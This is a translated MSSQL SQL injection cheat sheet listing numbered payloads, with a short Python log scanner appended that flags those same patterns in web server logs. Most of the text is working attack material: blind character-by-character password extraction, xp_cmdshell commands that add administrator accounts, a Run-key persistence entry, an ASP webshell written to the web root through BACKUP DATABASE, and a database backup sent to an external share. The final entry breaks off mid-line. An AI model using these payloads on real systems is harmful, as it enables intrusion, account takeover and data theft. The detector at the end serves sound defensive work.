1. Return the name of the connected database
and db_name()>0
2. Get the name of the connecting user
and user>0
3. Back up the database to the web directory
; backup database database_name to disk='c:\inetpub\wwwroot\1.db';--
4. Display the SQL Server version
and 1=(select @@version) or and 1=convert(int,@@version)--
5. Determine whether the xp_cmdshell extended stored procedure exists
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
6. Restore the xp_cmdshell extended stored procedure
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'e:\inetput\web\xplog70.dll';--
7. Write a command line or program into the startup (Run) key
; exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'help1', 'reg_sz', 'cmd.exe /c net user test ptlove /add'
8. View the current database name
and 0<>db_name(n) -- change n to 0, 1, 2, 3 ...
and 1=convert(int,db_name())--
9. Running CMD commands on an injectable SQL Server does not require xp_cmdshell (same as item 76)
10. Back up all data to the web directory
; backup database database_name to disk='c:\inetpub\wwwroot\save.db'
11. Copy cmd.exe into the scripts directory (for use with the IIS Unicode vulnerability)
; exec master.dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe"
12. Traverse the system directory structure, analyze the results and locate the web virtual directory
Create a temporary table temp: ; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
(1) Use xp_availablemedia to get all current drives and store them in the temp table: ; insert temp exec master.dbo.xp_availablemedia;--
Query the contents of temp to get the drive list and related information.
(2) Use xp_subdirs to get the subdirectory list and store it in the temp table: ; insert into temp (id) exec master.dbo.xp_subdirs 'c:\';--
(3) xp_dirtree can also be used to get the directory tree of all subdirectories and import it into the temp table: ; insert into temp (id, num1) exec master.dbo.xp_dirtree 'c:\';-- (tested successfully)
13. View the contents of a file with xp_cmdshell
; insert into temp (id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
14. Insert a text file into the temporary table
; bulk insert temp (id) from 'c:\inetpub\wwwroot\index.asp'
15. After each browse, delete everything in temp:
; delete from temp;--
16. View the temp table:
and (select top 1 id from TestDB.dbo.temp)>0 -- assuming TestDB is the name of the currently connected database
17. Guess all database names
and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)<>0 -- dbid=6, 7, 8 ... returns the other database names in turn
18. Guess the names of the user tables in the database
and (select count(*) from TestDB.dbo.table_name)>0 -- if the table name exists, abc.asp works normally, otherwise an error occurs; repeat until the system account table name is guessed
19. Determine whether sysadmin permission is held
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
20. Determine whether the user is sa
'sa'=(select system_user)
21. View database roles
; use model--
22. View the database name
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)--
23. Get the name of the first user-created table
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0)>0 -- assuming the database being read is TestDB.dbo
24. Get the name of the second user-created table
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in ('xyz'))>0
25. Get the name of the third user-created table
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in ('xyz',''))>0 -- '' is the second table name found
26. Get the name of the fourth user-created table
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in ('xyz','',''))>0 -- the two '' are the second and third table names found
27. Get the number of records in a table
and (select count(*) from table_name)<5 -- fewer than 5 records; <10 fewer than 10, and so on
28. Test the permission structure (mssql)
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
and 1=(select IS_MEMBER('db_owner'));--
29. Add mssql and system accounts
; exec master.dbo.sp_addlogin username;--
; exec master.dbo.sp_password null, password, username;--
; exec master.dbo.sp_addsrvrolemember username, sysadmin;--
; exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net user username password /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
30. Simple webshell
use model
create table cmd (str image);
insert into cmd (str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
It is then requested as follows:
http://ip/l.asp?c=dir
31. Guess field names
Guess: and (select count(field_name) from table_name)>0 -- if field_name exists, the page returns normally
Read: and (select top 1 col_name(object_id('table_name'),1) from sysobjects)>0 -- replace the 1 in col_name(object_id('table_name'),1) with 2, 3, 4, 5, 6 ... in turn to get all the field names
32. Guess the username and password
ASCII code character-by-character decoding: first guess the length of the field, then guess the value of each character position in turn.
and (select top 1 len(username) from admin)=X -- X=1, 2, 3, 4, 5 ... N. Assume username is the username field and admin is the table name. If abc.asp runs normally when X takes some value I, then I is the length of the first username.
and (select top 1 ascii(substring(username,m,1)) from admin)=n -- m runs from 1 to the length found in the previous step; m=1, 2, 3 ... guesses the 1st, 2nd, 3rd ... character; n is an ASCII value (1~9, a~z, A~Z), i.e. any value between 1 and 128; admin is the system user account table
33. Create a table
; create table table_name (column_1 data_type, column_2 data_type);--
34. Insert data into a table
; insert into table_name (column_1, column_2, ...) values ('value_1', 'value_2', ...);--
35. Update records
update table_name set column_1='value' ... where ...
36. Delete records
delete from table_name where ...
37. Drop a table
drop table table_name
38. Import a text file into a table
The bulk insert syntax can insert a text file into a temporary table. Simply create the table:
create table foo (line varchar(8000))
Then run bulk insert to load the file's contents into the table, for example:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
39. Command to back up the current database:
declare @a sysname; set @a=db_name(); backup database @a to disk='\\your_ip\your_share\bak.dat', name='test';--
40. Use sp_makewebtask to write a query's output to a file at the given UNC path
; exec master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
41. Get the directory listing of the SQL Server process's current working directory
exec master..xp_cmdshell 'dir'
42. Get a list of all users on the server
exec master..xp_cmdshell 'net user'
43. Read the registry (stored procedure)
exec xp_regread HKEY_LOCAL_MACHINE, 'System\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
44. xp_servicecontrol lets the user start, stop, pause and continue services
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
45. Show the drives available on the machine
xp_availablemedia
46. Get a directory tree
xp_dirtree
47. Terminate a process given its process ID
xp_terminate_process
48. Restore xp_cmdshell
exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
49. Drop the shell extended stored procedure (blocks shell commands)
sp_dropextendedproc "xp_cmdshell"
50. Add a system account directly without xp_cmdshell; very effective when xplog70.dll has been deleted
declare @shell int; exec sp_oacreate 'wscript.shell', @shell output; exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
51. Add a hax login to the database
; exec sp_addlogin hax;--
52. Set a password for hax
; exec master.dbo.sp_password null, password, hax;--
53. Add hax to the sysadmin role
; exec master.dbo.sp_addsrvrolemember hax, sysadmin;--
54. (1) Traverse the directory
; create table dirs (paths varchar(100), id int)
; insert dirs exec master.dbo.xp_dirtree 'c:\'
and (select top 1 paths from dirs)>0
and (select top 1 paths from dirs where paths not in ('paths already obtained'))>0
55. (2) Traverse the directory
; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
; insert temp exec master.dbo.xp_availablemedia;-- get all current drives
; insert into temp (id) exec master.dbo.xp_subdirs 'c:\';-- get the subdirectory list
; insert into temp (id, num1) exec master.dbo.xp_dirtree 'c:\';-- get the directory tree of all subdirectories
; insert into temp (id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- view the file contents
56. mssql stored procedures
xp_regenumvalues root_key, subkey
; exec xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\run' -- returns all values under the key as multiple record sets
xp_regread root_key, subkey, value_name
; exec xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\currentversion', 'commonfilesdir' -- returns the specified value
xp_regwrite root_key, subkey, value_name, value_type, value
There are two value types: REG_SZ and REG_DWORD.
; exec xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\currentversion', 'testvaluename', 'reg_sz', 'hello' -- writes to the registry
xp_regdeletevalue root_key, subkey, value_name
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\currentversion', 'testvaluename' -- deletes a value
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Tes
Origin: http://www.cnblogs.com/Real_Dream/articles/1587645.html
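Every primitive in the list above leaves a recognisable footprint in the web server's request log, which is where a defender can catch it. The following Python script is an added example, not code from the original page: it normalises the query string of constructed IIS-style log lines (double URL-decoding, lowercasing, collapsing whitespace) and flags the families catalogued here: stacked queries, xp_cmdshell, OLE automation, registry and filesystem extended procedures, BACKUP-to-disk file writes, BULK INSERT reads, login/role changes, privilege probes, catalog enumeration and the ascii(substring()) blind extraction of item 32. The log format, rule names and sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method uri query); not from the original page.
SAMPLE_LOG = """\
2009-07-01 10:00:01 GET /abc.asp id=5
2009-07-01 10:00:02 GET /abc.asp id=5+and+1%3D(select+IS_SRVROLEMEMBER('sysadmin'))--
2009-07-01 10:00:03 GET /abc.asp id=5;exec+master.dbo.xp_cmdshell+'net+user+test+ptlove+/add';--
2009-07-01 10:00:04 GET /abc.asp id=5+and+(select+top+1+ascii(substring(username,1,1))+from+admin)%3D97
2009-07-01 10:00:05 GET /abc.asp id=5;backup+database+model+to+disk%3D'g:%5Cwwwtest%5Cl.asp';--
2009-07-01 10:00:06 GET /abc.asp id=5;declare+@shell+int+exec+sp_oacreate+'wscript.shell',@shell+output
2009-07-01 10:00:07 GET /search.asp q=backup+and+restore+guide
"""

# One rule per family of primitives from the cheat sheet above (order fixes the output order).
RULES = [
    ("xp_cmdshell OS command", re.compile(r"\bxp_cmdshell\b")),
    ("extended proc (re)registration", re.compile(r"\bsp_(add|drop)extendedproc\b")),
    ("OLE automation shell", re.compile(r"\bsp_oa(create|method)\b")),
    ("registry access", re.compile(r"\bxp_reg(read|write|enumvalues|deletevalue|deletekey)\b")),
    ("filesystem/service xp_", re.compile(r"\bxp_(dirtree|subdirs|availablemedia|servicecontrol|terminate_process)\b")),
    ("file write via BACKUP", re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b")),
    ("file read via BULK INSERT", re.compile(r"\bbulk\s+insert\b")),
    ("web task file write", re.compile(r"\bsp_makewebtask\b")),
    ("login/role manipulation", re.compile(r"\bsp_(addlogin|password|addsrvrolemember)\b")),
    ("privilege probe", re.compile(r"\bis_srvrolemember\s*\(|\bis_member\s*\(|\bsystem_user\b|@@version")),
    ("catalog enumeration", re.compile(r"\b(sysobjects|sysdatabases|syscolumns)\b|\bcol_name\s*\(|\bdb_name\s*\(")),
    ("blind char-by-char extraction", re.compile(r"\bascii\s*\(\s*substring\s*\(|\blen\s*\(")),
]
# A ';' followed by a statement keyword marks a stacked (batched) query.
STACKED = re.compile(r";\s*(exec|declare|insert|create|backup|bulk|use|delete|drop|update)\b")
LOG_LINE = re.compile(r"^(?P<date>\S+) (?P<time>\S+) (?P<method>\S+) (?P<uri>\S+) (?P<query>\S*)$")


def normalize(query: str) -> str:
    """Decode twice (catches double URL encoding), drop /**/ comment padding,
    lowercase and collapse whitespace so the rules see one canonical form."""
    s = unquote_plus(unquote_plus(query)).replace("/**/", " ")
    return re.sub(r"\s+", " ", s).lower()


def classify_query(query: str) -> list:
    """Names of every rule that fires on one query string (empty list if clean)."""
    s = normalize(query)
    hits = [name for name, rx in RULES if rx.search(s)]
    if STACKED.search(s):
        hits.append("stacked query")
    return hits


def scan_log(text: str) -> list:
    """Return {line, uri, hits} for each log line whose query string matches a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify_query(m["query"])
        if hits:
            findings.append({"line": lineno, "uri": m["uri"], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['uri']}: {', '.join(f['hits'])}")
```

The innocuous line 7 ("backup and restore guide") is not flagged because the BACKUP rule requires the full BACKUP DATABASE ... TO DISK shape, not the bare word.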